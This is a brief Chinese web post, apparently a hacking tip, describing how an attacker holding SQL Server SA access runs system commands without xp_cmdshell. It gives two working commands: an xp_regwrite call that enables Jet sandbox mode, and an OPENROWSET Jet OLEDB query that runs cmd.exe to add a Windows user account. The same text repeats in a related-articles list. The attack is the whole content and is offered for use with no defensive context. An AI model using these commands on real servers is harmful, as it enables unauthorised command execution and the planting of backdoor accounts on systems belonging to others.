SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user cnfjhh fst /add")')
相关文章
- SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令
- 首先开启沙盘模式: exec master..xp_regwrite \'HKEY_LOCAL_MACHINE\',\'SOFTWAREMicrosoftJet4.0Engines\',\'SandBoxMode\',\'REG_DWORD\',1 然后利用jet.oledb执行系统命令 select * from openrowset(\'microsoft.jet.oledb.4.0\',\';database=沙盘,模式,下,不用,恢复,...
- SA 沙盘模式下不用恢复xp_cmdshell和xplog70.dll也执行命令
- 首先开启沙盘模式: exec master..xp_regwrite \'HKEY_LOCAL_MACHINE\',\'SOFTWAREMicrosoftJet4.0Engines\',\'SandBoxMode\',\'REG_DWORD\',1 然后利用jet.oledb执行系统命令 select * from openrowset(\'microsoft.jet.oledb.4.0\',\';database=沙盘,模式,下,不用,恢复,...
咨 询 客 服